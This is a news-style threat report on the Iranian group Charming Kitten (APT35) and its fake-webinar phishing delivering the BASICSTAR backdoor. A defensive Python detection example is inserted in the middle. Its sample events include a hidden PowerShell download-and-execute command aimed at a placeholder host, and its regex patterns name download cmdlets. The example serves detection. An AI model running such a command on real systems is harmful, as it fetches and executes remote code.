Charming Kitten (APT35): Iranian Hackers Target Middle East Policy Experts


Charming Kitten, also known as APT35, CharmingCypress, Mind Sandstorm, TA453, and Yellow Garuda, is an Iranian-origin threat actor group that has been linked to a new series of cyberattacks targeting Middle East policy experts. These attacks involve the deployment of a new backdoor named BASICSTAR through a fake webinar portal.

Charming Kitten is notorious for employing sophisticated social engineering tactics, often engaging targets in prolonged email conversations before sending malicious links. Recent attacks, discovered by Volexity researchers Ankur Saini, Callum Roxan, Charlie Gardner, and Damien Cash, have targeted high-profile individuals working on Middle Eastern affairs.

The attacks, believed to be orchestrated by individuals affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC), utilize various backdoors such as MischiefTut, MediaPl (EYEGLASS), PowerLess, BellaCiao, POWERSTAR (GorjolEcho), and NokNok. These cyber campaigns demonstrate the group’s persistence and adaptability despite previous exposure.

Phishing attempts observed between September and October 2023 involved Charming Kitten posing as the Rasanah International Institute for Iranian Studies (IIIS) to establish trust with targets. The attackers employed compromised email accounts and multiple threat-actor-controlled email accounts, a tactic known as Multi-Persona Impersonation (MPI).

The attack chains typically begin with RAR archives containing LNK files distributed via email, enticing recipients to join fake webinars on topics relevant to their interests. One such infection sequence deploys BASICSTAR and KORKULOADER, a PowerShell downloader script, capable of gathering system information, executing remote commands, and downloading decoy PDF files.
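The RAR-to-LNK-to-PowerShell chain described above leaves a recognisable process-creation pattern on the endpoint. The following is an added detection example (not code from the article or from Volexity) that scores simplified Sysmon-style events; the event records, the download URL and the assumption that WinRAR extracts double-clicked files into a `Temp\Rar$...` folder are all constructed for illustration.

```python
import re

# Constructed, simplified process-creation events (Sysmon Event ID 1 style);
# hypothetical sample data, not taken from the Volexity report.
SAMPLE_EVENTS = [
    {"pid": 4001, "ppid": 900, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe", "cwd": r"C:\Users\alice"},
    # Shortcut opened from an archive's temp extraction folder spawns a hidden downloader
    {"pid": 4120, "ppid": 4001,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -ep bypass -c "
                "\"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/w')\"",
     "cwd": r"C:\Users\alice\AppData\Local\Temp\Rar$DIa4120.1234"},
    # Benign: an analyst runs PowerShell from a terminal
    {"pid": 5000, "ppid": 3000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Get-ChildItem C:\\logs", "cwd": r"C:\logs"},
]

# Hidden-window / no-profile / execution-policy-bypass switches
EVASION_FLAGS = re.compile(r"-(w(indowstyle)?\s+hidden|nop|noprofile|ep\s+bypass|executionpolicy\s+bypass)", re.I)
# Download-and-execute primitives typical of a PowerShell downloader stage
DOWNLOAD_CMDLETS = re.compile(r"(DownloadString|DownloadFile|Invoke-WebRequest|iwr|IEX|Invoke-Expression)", re.I)
# Assumed archive-tool temp extraction folder names (WinRAR "Rar$", 7-Zip "7z")
ARCHIVE_TEMP = re.compile(r"\\Temp\\(Rar\$|7z)", re.I)

def score_event(event, parent_image):
    """Return (score, reasons) for one process-creation event; non-PowerShell events score 0."""
    reasons = []
    if not event["image"].lower().endswith("powershell.exe"):
        return 0, reasons
    if parent_image and parent_image.lower().endswith("explorer.exe"):
        reasons.append("powershell spawned by explorer.exe (user opened a shortcut or file)")
    if EVASION_FLAGS.search(event["cmdline"]):
        reasons.append("hidden window / no-profile / bypass flags")
    if DOWNLOAD_CMDLETS.search(event["cmdline"]):
        reasons.append("download-and-execute cmdlet in command line")
    if ARCHIVE_TEMP.search(event.get("cwd", "")):
        reasons.append("working directory is an archive extraction temp folder")
    return len(reasons), reasons

def find_suspicious(events, threshold=3):
    """Resolve each event's parent by pid and return (pid, score, reasons) for events at or above threshold."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        score, reasons = score_event(e, parent["image"] if parent else None)
        if score >= threshold:
            hits.append((e["pid"], score, reasons))
    return hits
```

A single indicator (explorer.exe spawning PowerShell, say) is common in normal use; the threshold requires several to co-occur, which is what distinguishes the lure-driven chain from an administrator's interactive session.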


Notably, the phishing attacks tailor their payload based on the target’s operating system, with Windows users receiving POWERLESS and Apple macOS users being targeted with NokNok through a VPN application laced with malware.

Researchers emphasize Charming Kitten’s commitment to surveillance and manipulation of targets, highlighting the group’s extensive campaign activity and dedicated human operators.

These revelations coincide with Recorded Future’s discovery of IRGC’s targeting of Western countries through a network of contracting companies specializing in surveillance and offensive technologies. These companies, including Ayandeh Sazan Sepher Aria, DSP Research Institute, Sabrin Kish, Soroush Saman, Mahak Rayan Afraz, and Parnian Telecommunication and Electronic Company, are closely associated with the IRGC and serve as conduits for cyber operations.

The relationship between these Iranian contracting companies and the IRGC underscores the regime’s concerted efforts to conceal its cyber activities and export offensive technologies to countries such as Iraq, Syria, and Lebanon.

Overall, the emergence of BASICSTAR and Charming Kitten’s continued cyber operations highlight the persistent threat posed by Iranian-affiliated threat actors to regional stability and global cybersecurity.
